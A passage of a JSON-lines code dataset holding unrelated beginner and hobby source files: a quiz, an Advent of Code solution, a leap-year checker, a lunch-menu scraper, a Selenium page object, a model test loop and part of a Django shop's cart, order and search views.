[SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr3 == 'NAO':\n r3 = 2\nelse:\n r3 = 0\n\nprint(\"\\nQuarta pergunta! VALEEEEENDOOOOO!\")\nprint(\"\\nA Turma B de TDS, é a melhor do Portão?\")\npr4 = str(input(\"***** Digite [SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr4 == 'NAO':\n r4 = 2\nelse:\n r4 = 0\n\nsoma = r1+r2+r3+r4\n\nprint(\"\\n\\nOlá {}. 
A Soma da Pontuação é {}\".format(nm, soma))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"AulaSenai24.py","file_name":"AulaSenai24.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"638904786","text":"import re\n\nff = open('8.txt')\n\nrealc = 0\nmemc = 0\n\n# def parse(line):\n# line = line.strip()\n# line = line[1:-1]\n# line = line.replace('\\\\\\\\','b')\n# line = line.replace('\\\\\"','q')\n# line = re.sub('\\\\\\\\x.','',line)\n# return line\n\n# for line in ff.readlines():\n# line = line.strip()\n# reel = line\n# mem = parse(line)\n# realc += len(reel)\n# memc += len(mem)\n# print (\"%s %d %s %d\" % (reel,len(reel),mem,len(mem)))\n\ndef parse(line):\n line = line.strip()\n line = line.replace('\\\\','bb')\n line = line.replace('\"','bq')\n line = '\"' + line + '\"'\n return line\n\nfor line in ff.readlines():\n line = line.strip()\n reel = line\n mem = parse(line)\n realc += len(reel)\n memc += len(mem)\n print (\"%s %d %s %d\" % (reel,len(reel),mem,len(mem)))\n\n# print(parse(\"ucrmjvmimmcq\\x88\\xd9\\\"lz\"))\n# print(parse(\"srgost\\\"\\\"rbkcqtlccu\\x65ohjptstrjkzy\"))\n\n# print(real('''\"d\\\\\"\"'''))\n# print(mem('''\"d\\\\\"\"'''))\n\nprint (realc)\nprint (memc)\nprint (memc - realc)\n","sub_path":"Dropbox/adventofcode/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"243857702","text":"# 8-12. Sandwiches: Write a function that accepts a list of items a person wants on a sandwich. The function should have one parameter that collects as many items as the function call provides, and it should print a summary of the sandwich that is being ordered. Call the function three times, using a different number of arguments each time.\n\ndef make_sandwich(*sandwiches):\n print('\\nThis are the sandwiches that we have: ')\n for sandwich in sandwiches:\n print(\"-\" + sandwich)\n\nmake_sandwich('tuna')\nmake_sandwich('tuna','pastrami')\nmake_sandwich('blt', 'pastrami', 'cheese')","sub_path":"chapter_08/chapter_8_8_12.py","file_name":"chapter_8_8_12.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"259113805","text":"# 🚨 Don't change the code below 👇\r\njahr = int(input(\"Which jahr do you want to check? 
\"))\r\n# 🚨 Don't change the code above 👆\r\n\r\n#Write your code below this line 👇\r\n\r\nif jahr % 4 == 0 and jahr % 100 != 0:\r\n print(\"Schaltjahr.\")\r\nelif jahr % 4 == 0 and jahr % 100 == 0:\r\n if jahr % 400 == 0:\r\n print(\"Schaltjahr.\")\r\n else:\r\n print(\"Kein Schaltjahr.\")\r\nelse:\r\n print(\"Kein Schaltjahr.\")","sub_path":"Leap_Year_Calculator.py","file_name":"Leap_Year_Calculator.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"545729796","text":"from requests import get\nfrom datetime import date\nfrom lxml import html\nimport re\n\n# Requirements on rpm-based systems:\n# yum install libxslt-devel libxml2-devel python-devel\n# pip install requests lxml cssselect\n\n# Optionally, if your system has low amount of RAM, the installation of\n# lxml may fail with \"gcc: internal compiler error: Killed (program cc1)\".\n# In that case, install the \"python-lxml\" and \"python-cssselect\" packages\n# with Yum:\n# yum install python-lxml\n\n# Lunchtime:\n# \"http://www.lunchtime.cz/podnik/\" + restaurant code below\nlunchtime = {\"paladeo\" : \"4088-paladeo-restaurante\", \"kotelna\" : \"1427-u-kotelny\"}\n\ndef scrapeLunchTime(restaurant):\n \"\"\"\n Scrape menus from restaurants that have RSS feeds on lunchtime.cz\n \"\"\"\n # GET the entire website that displays the menu\n response = get(\"http://www.lunchtime.cz/podnik/\" + restaurant)\n\n # Convert string in response to HTML that can be parsed with cssselect\n tree = html.fromstring(response.text)\n\n # Get the menu from div with class .daily-menu-item-list\n menu = tree.cssselect(\".daily-menu-item-list\")\n\n # Return the first match\n return html.tostring(menu[0])\n\n# Rebio:\n# CZ - http://www.rebio.cz/Rebio-Park/gn.workroom.aspx\n\ndef scrapeRebio():\n \"\"\"\n Scrape menu from Rebio Park restaurant\n \"\"\"\n # GET the entire website that displays the menu\n response = get(\"http://www.rebio.cz/Rebio-Park/gn.workroom.aspx\")\n\n # Convert string in response to HTML that can be parsed with cssselect\n tree = html.fromstring(response.text)\n\n # Get the h3 that holds the menu for today\n h3 = tree.cssselect(\".h-today-special.r-image\")\n\n # Return the next element of the h3 found in previous step\n # that is the
      that holds the menu, also encoded in UTF-8\n return html.tostring(h3[0].getnext())#.encode('utf-8').strip()\n\ndef scrapeKanas():\n \"\"\"\n Scrapu menu from kanas.cz\n \"\"\"\n # Get today's date to construct link for today's menu\n day = date.today().strftime(\"%Y/%-m/%-d\")\n response = get(\"http://www.kanas.cz/stranka/date/\" + day)\n tree = html.fromstring(response.text)\n\n # Get the restaurant's menu, which is placed under tab1\n restaurant_menu = tree.cssselect(\"#tab1\")\n menu = html.tostring(restaurant_menu[0])\n\n # Get the cafeteria's menu, which is placed under tab2\n cafeteria_menu = tree.cssselect(\"#tab2\")\n menu += html.tostring(cafeteria_menu[0])\n\n # Scraping kanas.cz returns two-byte ISO encoding; only manually\n # converting it to UTF-8 works (no idea how to do this with some Python\n # encoding magic)\n menu = menu.replace(\"Á\",\"Á\") # Capital A, acute\n menu = menu.replace(\"á\",\"á\") # Small a, acute\n menu = menu.replace(\"ÄŒ\",\"Č\") # Capital C, caron\n menu = menu.replace(\"č\",\"č\") # Small c, caron\n # menu = menu.replace(\"\",\"Ď\") # Capital D, caron\n menu = menu.replace(\"ď\",\"ď\") # Small d, caron\n # menu = menu.replace(\"\",\"É\") # Capital E, acute\n menu = menu.replace(\"é\",\"é\") # Small e, acute\n # menu = menu.replace(\"\",\"Ě\") # Capital E, caron\n menu = menu.replace(\"Ä›\",\"ě\") # Small e, caron\n # menu = menu.replace(\"\",\"Í\") # Capital I, acute\n menu = menu.replace(\"í\",\"í\") # Small i, acute\n # menu = menu.replace(\"\",\"Ň\") # Capital N, caron\n menu = menu.replace(\"ň\",\"ň\") # Small n, caron\n # menu = menu.replace(\"\",\"Ó\") # Capital O, acute\n menu = menu.replace(\"ó\",\"ó\") # Small o, acute\n # menu = menu.replace(\"\",\"Ř\") # Capital R, caron\n menu = menu.replace(\"Å™\",\"ř\") # Small r, caron\n menu = menu.replace(\"Å \",\"Š\") # Capital S, caron\n menu = menu.replace(\"Å¡\",\"š\") # Small s, caron\n # menu = menu.replace(\"\",\"Ť\") # Capital T, caron\n # menu = menu.replace(\"\",\"ť\") # Small t, caron\n # menu = menu.replace(\"\",\"Ú\") # Capital U, acute\n menu = menu.replace(\"ů\",\"ú\") # Small u, acute\n # menu = menu.replace(\"\",\"Ů\") # Capital U, ring\n # menu = menu.replace(\"\",\"ů\") # Small u, ring\n # menu = menu.replace(\"\",\"Ý\") # Capital Y, acute\n menu = menu.replace(\"ý\",\"ý\") # Small y, acute\n # menu = menu.replace(\"\",\"Ž\") # Capital Z, caron\n menu = menu.replace(\"ž\",\"ž\") # Small z, caron\n\n # Replace useless day info with restaurant type\n menu = re.sub(r\"
.*\d{4}\", \"Kanas Restaurace\", menu, count=2)\n menu = re.sub(r\".*\d{4}\", \"Kanas Cafeteria
      \", menu)\n\n return menu\n\n# Head of the HTML file that contains all usual cruft plus link to lunch.css\n# lunch.css modifies some of the CSS from the scraped content\nbody = ''\n\n# Div with a link to Google Translate for the English translation\nbody += ''\n\n# Add content from all restaurants\nbody += '
Rebio' + scrapeRebio()\nbody += 'Kotelna' + scrapeLunchTime(lunchtime[\"kotelna\"])\n#DISABLE temporarily###body += 'Paladeo
      ' + scrapeLunchTime(lunchtime[\"paladeo\"])\nbody += scrapeKanas()\n\n# Tail of the HTML\nbody += ''\n\n# Write to the lunch file in httpd's document root\nwith open(\"/var/www/html/lunch\", \"w\") as html_file:\n html_file.write(body)\n","sub_path":"scrape_my_lunch.py","file_name":"scrape_my_lunch.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"234194335","text":"#encoding=utf-8\n\nfrom app_object.base import Base\nfrom common import LogManage\n\nclass WareHouseInfoBase(Base.Base):\n u\"\"\"仓库信息原子操作\"\"\"\n def switch_to_iframe(self):\n u\"\"\"切换进仓库信息页签的iframe\"\"\"\n self.switch_to_iframe_by_titlename(\"仓库信息\")\n\n def select_warehouse_ckbox(self, name):\n u\"\"\"根据仓库名称勾选仓库\"\"\"\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/preceding-sibling::td/input\"\n self.click_element(self.get_element_by_xpath(xpath))\n\n def is_enabled_of_warehouse(self, name):\n u\"\"\"获取仓库是否启用状态\"\"\"\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/following-sibling::td[@aria-describedby='defaultTable_is_enabled']\"\n is_enable = self.get_element_by_xpath(xpath)\n result = is_enable.text\n if result == u'是':\n return True\n elif result == u'否':\n return False\n else:\n return -1\n\n def click_edit_btn_of_warehouse(self, name):\n u\"\"\"点击指定仓库上的编辑按钮\"\"\"\n edit = u'编辑'\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/preceding-sibling::td/a[@title='\" + edit + \"']\"\n self.click_element(self.get_element_by_xpath(xpath))\n\n def click_delete_btn_of_warehouse(self, name):\n u\"\"\"点击指定仓库上的删除按钮\"\"\"\n edit = u'编辑'\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/preceding-sibling::td/a[@title='\" + edit + \"']/following-sibling::*[1]\"\n LogManage.info(xpath)\n self.click_element(self.get_element_by_xpath(xpath))\n","sub_path":"app_task/basefiles/warehouseinfo/WareHouseInfoBase.py","file_name":"WareHouseInfoBase.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"446474318","text":"\n\ndef test(dataset_questions_path, features_path, BATCH_SIZE,\n lstm, rn, criterion, questions_dictionary, answers_dictionary, device,\n MAX_QUESTION_LENGTH, isObjectFeatures, OBJECT_TRIM=\"default\"):\n\n val_loss = 0.\n val_accuracy = 0.\n\n set_eval_mode(rn)\n set_eval_mode(lstm)\n\n with torch.no_grad():\n\n dataset_size_remain = get_size(dataset_questions_path)\n\n print(\"Testing\")\n batch = get_batch(dataset_questions_path, features_path, BATCH_SIZE,\n device, isObjectFeatures, categoryBatch=True, OBJECT_TRIM=OBJECT_TRIM)\n\n groups = {}\n groups_acc = []\n types = {\"semantic\": {},\n \"detailed\": {},\n \"structural\": {}\n }\n semantic_acc = []\n structural_acc = []\n detailed_acc = []\n\n #pbar = tqdm(total=num_batch)\n batch_number = 0\n while dataset_size_remain > 0:\n\n # Get batch\n\n if dataset_size_remain < BATCH_SIZE:\n break\n dataset_size_remain -= BATCH_SIZE\n\n #question_batch, answer_ground_truth_batch, object_features_batch, objectsNum_batch = next(batch)\n question_batch, answer_ground_truth_batch, object_features_batch, category_batch = next(\n batch)\n\n h_q = lstm.reset_hidden_state()\n\n question_batch, answer_ground_truth_batch = vectorize_gqa(question_batch, answer_ground_truth_batch,\n questions_dictionary, 
answers_dictionary,\n BATCH_SIZE, device, MAX_QUESTION_LENGTH)\n\n ## Pass question through LSTM\n question_emb_batch, h_q = lstm.process_question(\n question_batch, h_q)\n question_emb_batch = question_emb_batch[:, -1]\n\n ## Pass question emb and object features to the Relation Network\n rr = rn(object_features_batch, question_emb_batch)\n\n loss = criterion(rr, answer_ground_truth_batch)\n val_loss += loss.item()\n\n correct, _, correct_answers = get_answer(\n rr, answer_ground_truth_batch, answers_dictionary, return_answer=True)\n val_accuracy += correct\n\n \"\"\"\n Structure:\n groups -> {\n \"group_name1\": (100, 200), -> This means 200 question were tested and 100 were correct, giving 50% accuracy\n \"group_name2\": (20, 30),\n \"group_name3\": (5, 8)\n }\n \n types -> {\n \"structural\": {\n \"struct1\": (20, 30), -> same structure as the one on groups\n \"struct2\": (10, 15),\n },\n \"semantic\": {}, -> they might be empty (so might \"groups\")\n \"detailed\": {\n \"det1\": (1, 4),\n \"det2\": (30, 45)\n }\n }\n \"\"\"\n\n # Obtain results for each group and type\n for question, correct_answer in zip(category_batch, correct_answers):\n\n group = question[\"group\"] # e.g. -> all color questions\n if group is not None:\n group_rights, group_total = groups.get(\n group, (0, 0)) # groups[group] = (0,0)\n groups[group] = (\n group_rights + correct_answer, group_total + 1)\n else:\n group_rights, group_total = groups.get(\"None\", (0, 0))\n groups[\"None\"] = (\n group_rights + correct_answer, group_total + 1)\n\n # -> e.g. semantic, detailed, structural\n for typ in question[\"types\"]:\n type_category = question[\"types\"][typ] # -> e.g. query\n if type_category is not None:\n category_rights, category_total = types[typ].get(\n type_category, (0, 0))\n types[typ][type_category] = (\n category_rights + correct_answer, category_total + 1)\n else:\n category_rights, category_total = types[typ].get(\n \"None\", (0, 0))\n types[typ][\"None\"] = (\n category_rights + correct_answer, category_total + 1)\n\n batch_number += 1\n #pbar.update()\n\n print(f\"Accuracy seperated by group\")\n for group in groups:\n rights, total = groups[group]\n groups_acc.append([group, 100*rights/total])\n print(\n f\"Group: {group} -> {rights}/{total} gives us {100*rights/total}% \")\n write_csv(groups_acc, \"group_accuracy\")\n\n print(\"___________________________________\")\n\n print(f\"Accuracy seperated by types\")\n for typ in types:\n print(f\"Type: {typ}\")\n current_type = types[typ]\n for category in current_type:\n rights, total = current_type[category]\n print(\n f\"Category: {category} -> {rights}/{total} gives us {100*rights/total}% \")\n print(\"___________________________________\")\n\n for category in types[\"semantic\"]:\n rights, total = types[\"semantic\"][category]\n semantic_acc.append([category, 100*rights/total])\n write_csv(semantic_acc, \"semantic_accuracy\")\n\n for category in types[\"structural\"]:\n rights, total = types[\"structural\"][category]\n structural_acc.append([category, 100*rights/total])\n write_csv(structural_acc, \"structural_accuracy\")\n\n for category in types[\"detailed\"]:\n rights, total = types[\"detailed\"][category]\n detailed_acc.append([category, 100*rights/total])\n write_csv(detailed_acc, \"detailed_accuracy\")\n\n #pbar.close()\n\n val_accuracy /= float(batch_number)\n val_loss /= float(batch_number)\n\n return val_loss, 
val_accuracy\n","sub_path":"revisando_testing_func.py","file_name":"revisando_testing_func.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"8527346","text":"\n\"\"\" What we write here will end up in tha package __doc__\n Initialisation file for Package: iso3166_ext\n from: EC-software \"\"\"\n\nimport os # Needed for definition of root_dir\nfrom iso3166_ext.world import Territories # import this module on package import\n\n# The names: 'countries' and 'get' makes the module compatible with https://pypi.org/project/iso3166/\ncountries = world.Territories\nget = countries.get\n\n__version__ = \"0.0.3\" # Version of the iso3166_ext package\n__all__ = [get] # import these modules on package import *\n\n# The root path of this package, for later reference, I think ...\nroot_dir = os.path.dirname(os.path.realpath(__file__))\n\n","sub_path":"iso3166_ext/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"353579201","text":"\"\"\"\nThe module manages shops.\n\t\n\"\"\"\n\nfrom dargent.views import TemplateView, LoginStateView, BackOffsetView\nfrom dargent.products.models import Product, ProductCategory, Producer, Country\nfrom dargent.productprops.models import ShopProductCategory, ShopProducer, ShopCountry\nfrom dargent.items import ItemPage\nfrom django.utils import simplejson\nfrom shops.forms import SearchProductForm, IntegerEmptyStringField\nfrom dargent.utils import Cart, Search, Location, get_db_key_from_choices\nfrom django.shortcuts import redirect\nfrom django.forms.formsets import formset_factory\nfrom orders.forms import OrderProductCountForm, OrderDetailForm\nfrom orders.models import OrderProductCount, OrderDetail\nfrom dargent.utils import DictSessionManager, get_shop_location\nfrom dargent.settings import SITE_URL, ORDER_EMAIL_SUBJECT\nfrom dargent.templateemail import TemplateEmail\t\nfrom shops.models import Shop, ShopFace\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom dargent.utils import get_shop_name\nfrom dargent.orders.models import OrderDetail\nfrom dargent.utils import OrderDetail as OrderDetailInSession, ShopGetter, get_field_list_from_meta, get_sorted_by_name\nfrom dargent.settings import DOMAIN\nfrom utils import get_shop_id_by_name, get_shop_by_name, assert_user_shop\nfrom settings import MEDIA_URL\nfrom django.contrib.auth.models import User\nfrom userprofiles.models import UserProfile\nfrom dargent.settings import NUM_ITEMS_ON_PAGE\nfrom django.forms import IntegerField, CharField\nfrom copy import copy\nfrom orders.models import OrderDetail, OrderProductCount\nfrom dargent.specialpages.views import page403Or404\nfrom dargent.home.models import MenuNotifications, MENU_NOTIFICATIONS_CHOICES\n\nimport dargent.utils as utils\n\nfrom datetime import datetime\n\ndef shopbase( cls ):\n\t\"\"\"\n\tBase view for shops: retrieve shops properties such as background, fonts, etc.\n\t\"\"\"\n\tdef _pre_view( self_obj, request, shop_name, *args, **kwargs ):\n\t\tself_obj._shop = get_shop_by_name( request.session, shop_name )\n\t\tif self_obj._shop.is_removed:\n\t\t\treturn page403Or404( request )\n\t\tself_obj._shop_face = ShopFace.objects.get( shop = self_obj._shop )\n\t\tself_obj._shop_id = get_shop_id_by_name( request.session, shop_name )\n\t\treturn super( cls, self_obj ).pre_view( request, shop_name, *args, **kwargs )\n\n\tdef _view( 
self_obj, request, shop_name, dictionary = {} ):\n\t\tuser = get_shop_by_name( request.session, shop_name ).user\n\t\td = {\t\n\t\t\t\t'background': self_obj._shop_face.get_background(),\n\t\t\t\t'product_bk_color': self_obj._shop_face.product_bk_color,\n\t\t\t\t'product_text_color': self_obj._shop_face.product_text_color,\n\t\t\t\t'menu_bk_color': self_obj._shop_face.menu_bk_color,\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t'menu_text_color': self_obj._shop_face.menu_text_color,\n\t\t\t\t'user_text_color': self_obj._shop_face.user_text_color,\n\t\t\t\t'domain_shop_name': get_shop_name( request ),\n\t\t\t\t'user_username': user.username,\n\t\t\t\t'user_first_name': user.first_name,\n\t\t\t\t'user_last_name': user.last_name }\n\t\ttry:\t\n\t\t\towner_profile = UserProfile.objects.get( user = user )\n\t\texcept ObjectDoesNotExist:\n\t\t\td.update( has_user_profile = False )\n\t\telse:\n\t\t\tuser_image = owner_profile.image.url\n\t\t\td.update( user_profile = owner_profile )\n\t\t\td.update( has_user_profile = True )\n\t\td.update( dictionary )\n\t\treturn super( cls, self_obj ).view( request, d )\n\tsetattr( cls, 'pre_view', _pre_view )\n\tsetattr( cls, 'view', _view )\n\treturn cls\n\n@shopbase\nclass ShopBaseView( TemplateView ):\n\t\"\"\"\n\tFor pages which don't that we don't support 'back' click in a browser\n\t\"\"\"\n\tpass\n\n@shopbase\nclass BackOffsetShopBaseView( BackOffsetView ):\n\t\"\"\"\n\tFor pages which do support 'back' click in a browser\n\t\"\"\"\n\tpass\n\nclass OrderTemplateEmail( TemplateEmail ):\n\t\"\"\"\n\tClass is using to send email about order\n\t\"\"\"\n\tTEMPLATE = \"shops-email-new-order.html\"\n\tSUBJECT = ORDER_EMAIL_SUBJECT\n\t\t\nclass GoToOrderView( ShopBaseView ):\n\t\"\"\"\n\tThe view with a formset for the order.\t\n\t\"\"\"\n\tTEMPLATE = 'shops-go-to-order.html'\n\n\tOPC_FORM_PREFIX = 'order_product_count_form'\n\t\n\tdef view( self, request, shop_name ):\n\n\t\tcart = Cart( request.session )\n\n\t\tproducts = cart.get()\n\t\tproducts_as_list = cart.as_list()\n\t\tnum_products = len( products )\n\n\t\tdelivery_cost = Shop.objects.get( name = shop_name ).delivery_cost\n\n\t\torder_sum = utils.calc_order_sum( products_as_list, delivery_cost )\n\t\tOrderProductCountFormset = formset_factory( OrderProductCountForm )\n\t\n\t\tif request.method == 'POST':\n\t\t\torder_product_count_formset = OrderProductCountFormset( request.POST, prefix = GoToOrderView.OPC_FORM_PREFIX )\t\t\n\t\t\torder_detail_form = OrderDetailForm( request.POST )\n\n\t\t\tif order_product_count_formset.is_valid() and order_detail_form.is_valid():\n\t\t\t\t#order_detail_form.save()\n\t\t\t\t\n\t\t\t\torder_detail = OrderDetail()\n\t\t\t\taddress = order_detail_form.cleaned_data[ 'address' ]\n\t\t\t\tphone = order_detail_form.cleaned_data[ 'phone' ]\n\t\t\t\tname_surname = order_detail_form.cleaned_data[ 'name_surname' ]\n\t\t\t\torder_detail.address = address\n\t\t\t\torder_detail.phone = phone\n\t\t\t\torder_detail.name_surname = name_surname\n\t\t\t\torder_detail.shop = Shop.objects.get( id = self._shop_id )\n\t\t\t\torder_detail.save()\n\n\t\t\t\torder_detail_in_session = OrderDetailInSession( request.session )\n\n\t\t\t\torder_detail_in_session.set(\tname_surname = name_surname,\n\t\t\t\t\t\t\t\t\t\t\t\tphone = phone,\n\t\t\t\t\t\t\t\t\t\t\t\taddress = address,\n\t\t\t\t\t\t\t\t\t\t\t\torder_time = datetime.now(),\n\t\t\t\t\t\t\t\t\t\t\t\tdelivery_cost = delivery_cost )\n\t\t\t\tcart.empty( commit = False )\n\n\t\t\t\tfor form in 
order_product_count_formset.forms:\n\t\t\t\t\torder_product_count = OrderProductCount()\n\t\t\t\t\tcount = form.cleaned_data[ 'count' ]\n\t\t\t\t\torder_product_count.count = count\n\t\t\t\t\torder_product_count.order_detail = order_detail\n\t\t\t\t\tproduct = form.cleaned_data[ 'product' ]\n\t\t\t\t\torder_product_count.product = product\n\t\t\t\t\torder_product_count.save()\t\t\t\t\t\t\t\t\t\n\t\t\t\t\tcart.add_item(\tproduct_id = product.id, \n\t\t\t\t\t\t\t\t\tname = product.name, \n\t\t\t\t\t\t\t\t\tdescription = product.description,\n\t\t\t\t\t\t\t\t\tprice = product.price,\n\t\t\t\t\t\t\t\t\tthumbnail_url = product.thumbnail_url,\n\t\t\t\t\t\t\t\t\tcount = count,\n\t\t\t\t\t\t\t\t\tcommit = False )\n\n\t\t\t\tcart.commit()\n\t\t\t\t\n\t\t\t\tshop_name = get_shop_name( request )\n\n\t\t\t\tuser = get_shop_by_name( request.session, shop_name ).user\n\t\t\t\t\n\t\t\t\temail = user.email\n\t\t\t\tOrderTemplateEmail(\tfrom_email = \"robot@{0}\".format( DOMAIN ), \n\t\t\t\t\t\t\t\t\temail_list = [ email, \"sergzach@gmail.com\" ] \\\n\t\t\t\t\t\t\t\t\t).send( { 'shop_name': shop_name, 'domain': DOMAIN, 'sum': str( order_sum ), 'products': products, 'order_id': order_detail.id } )\n\n\t\t\t\t# increment 'my orders' menu notification\n\t\t\t\tMenuNotifications.inc( user = user, notification = 'my_orders' )\n\n\t\t\t\treturn self._redirect( 'http://{0}.{1}/order-completed/'.format( shop_name, DOMAIN ) )\n\t\telse:\n\t\t\topc_formset_data = {\n\t\t\t\tGoToOrderView.OPC_FORM_PREFIX + '-TOTAL_FORMS': unicode( num_products ),\n\t\t\t\tGoToOrderView.OPC_FORM_PREFIX + '-INITIAL_FORMS': u\"0\",\n\t\t\t\tGoToOrderView.OPC_FORM_PREFIX + '-MAX_NUM_FORMS': u\"\"\n\t\t\t}\n\n\t\t\tfor i in range( 0, num_products ):\n\t\t\t\topc_formset_data.update( { GoToOrderView.OPC_FORM_PREFIX + '-' + str( i ) + '-' + 'count': products[ i ][ 1 ][ 'count' ] } )\n\t\t\t\t\n\t\t\torder_product_count_formset = OrderProductCountFormset(\topc_formset_data, prefix = GoToOrderView.OPC_FORM_PREFIX )\n\n\t\t\torder_detail_form = OrderDetailForm( initial = utils.OrderDetail( request.session ).get_default() )\n\n\t\tproducts_and_count_forms = []\n\t\topc_forms = order_product_count_formset.forms\n\t\tfor i in range( 0, len( opc_forms ) ):\n\t\t\tproducts_and_count_forms.append( ( products[ i ], opc_forms[ i ] ) )\n\t\n\t\treturn super( GoToOrderView, self ).view( request, shop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t\t\t\t\t'products_and_count_forms': products_and_count_forms, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'num_products_in_cart': num_products, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'order_sum': order_sum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'order_product_count_formset': order_product_count_formset,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'order_detail_form': order_detail_form,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'delivery_cost': delivery_cost } )\n\nclass OrderCompletedView( ShopBaseView ):\n\t\"\"\"\n\tDisplays a message to a user that the order is completed.\n\tAlso displays a message about order sum, customer name, address, etc.\n\t\"\"\"\n\tTEMPLATE = \"shops-order-completed.html\"\n\n\tdef view( self, request, shop_name ):\n\n\t\tcart = Cart( request.session )\n\n\t\torder_detail_in_session = utils.OrderDetail( request.session )\n\t\torder_detail = order_detail_in_session.get()\n\n\t\tdelivery_cost = order_detail[ 'delivery_cost' ]\n\n\t\tproducts = copy( cart.as_list() )\n\t\tcart.empty()\n\n\t\torder_sum = utils.calc_order_sum( products, delivery_cost )\n\t\t\n\t\treturn super( OrderCompletedView, self ).view(\trequest, 
shop_name,\n\t\t\t\t\t\t\t\t\t\t\t{\t'name_surname': order_detail[ 'name_surname' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'phone': order_detail[ 'phone' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'address': order_detail[ 'address' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'delivery_cost': delivery_cost,\n\t\t\t\t\t\t\t\t\t\t\t\t'order_time': order_detail[ 'order_time' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'products': products,\n\t\t\t\t\t\t\t\t\t\t\t\t'order_sum': order_sum\n\t\t\t\t\t\t\t\t\t\t\t} )\n\nclass CartView( BackOffsetShopBaseView ):\n\t\"\"\"\n\tIt displays products in the cart.\n\t\"\"\"\n\tTEMPLATE = 'shops-cart.html'\n\n\tdef view( self, request, shop_name ):\n\t\tLocation( request.session, 'shop' ).set( get_shop_location( shop_name, 'cart', request.GET ) )\n\t\treq = request.REQUEST\n\t\tcart = Cart( request.session )\n\t\tif request.method == 'POST':\n\t\t\tcart.remove_item( req[ 'product_id' ] )\n\n\t\tpage = int( req[ 'page' ] ) if 'page' in req else 1\n\t\tdelivery_cost = get_shop_by_name( request.session, shop_name ).delivery_cost\n\n\t\tpage_products = ItemPage.get_by_items_list( items_list = cart.get(), page = page )\n\n\t\treturn super( CartView, self ).view( request, shop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t{\t'page_products': page_products,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'is_cart_empty': len( page_products[ 'object_list' ] ) == 0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'page': int( page ),\n\t\t\t\t\t\t\t\t\t\t\t\t\t'num_products_on_page': NUM_ITEMS_ON_PAGE,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'sum': cart.get_sum_price() + delivery_cost\n\t\t\t\t\t\t\t\t\t\t\t\t} )\n\n\nclass SearchView( BackOffsetShopBaseView ):\n\t\"\"\"\n\tA view with search on products\n\t\"\"\"\n\tTEMPLATE = \"shops-search.html\"\n\t\t\n\t@staticmethod\n\tdef _remove_key_if( d, key, val ):\n\t\tif d[ key ] == val:\n\t\t\tdel d[ key ]\n\t\n\t@staticmethod\n\tdef _remove_key_if_empty_str( d, key ):\n\t\tSearchView._remove_key_if( d, key, \"\" )\n\n\t@staticmethod\n\tdef _remove_key_if_0( d, key ):\t\t\n\t\tSearchView._remove_key_if( d, key, 0 )\n\n\t@staticmethod\n\tdef _removed_empty_items( form, q_dict ):\n\t\tresult = copy( q_dict )\n\t\tfor field_name in form.fields.iterkeys():\n\t\t\tfield = form.fields[ field_name ]\t\t\t\t\t\n\t\t\tif issubclass( type( field ), IntegerEmptyStringField ):\t\t\t\t\t\n\t\t\t\tSearchView._remove_key_if_empty_str( result, field_name )\t\t\t\t\t\t\n\t\t\telif issubclass( type( field ), IntegerField ):\n\t\t\t\tSearchView._remove_key_if_0( result, field_name )\n\t\treturn result\n\t\n\tdef view( self, request, shop_name, dictionary = {} ):\t\t\n\t\tcart = Cart( request.session )\t\t\n\n\t\treq = request.REQUEST\n\t\tLocation( request.session, 'shop' ).set( get_shop_location( shop_name, 'search', request.GET ) )\n\n\t\tsearch = Search( request.session )\n\t\tsearch_is_set = search.is_set()\n\t\t\n\t\td = {\t'categories': get_sorted_by_name( get_field_list_from_meta( 'product_category', ShopProductCategory, 'shop', self._shop_id ) ),\t\t\t\t\t\n\t\t\t\t'producers': get_sorted_by_name( get_field_list_from_meta( 'producer', ShopProducer, 'shop', self._shop_id ) ),\n\t\t\t\t'countries': get_sorted_by_name( get_field_list_from_meta( 'country', ShopCountry, 'shop', self._shop_id ) ),\n\t\t\t\t'search_is_set': search_is_set\n\t\t}\n\n\t\tq_dict = { 'shop': self._shop_id }\n\n\t\tif request.method == 'POST':\n\t\t\tform = 